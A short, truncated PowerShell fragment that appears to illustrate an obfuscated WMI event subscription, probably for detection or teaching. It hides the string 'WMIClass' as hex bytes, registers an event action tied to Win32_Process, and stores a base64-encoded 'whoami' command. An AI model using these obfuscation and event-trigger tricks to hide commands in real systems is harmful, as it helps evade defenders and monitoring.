chrissanders

$charArray = @(0x57, 0x4D, 0x49, 0x43, 0x6C, 0x61, 0x73, 0x73)
$strClass = [String]::new($charArray -as [Char[]])
$wmiParams = @{
Class = $strClass
Namespace = "root\cimv2"
Filter = "Name = 'Win32_Process'"
}

Register-CimIndicationEvent @wmiParams -Action {
$tyd = "V2hvYW1pCg=="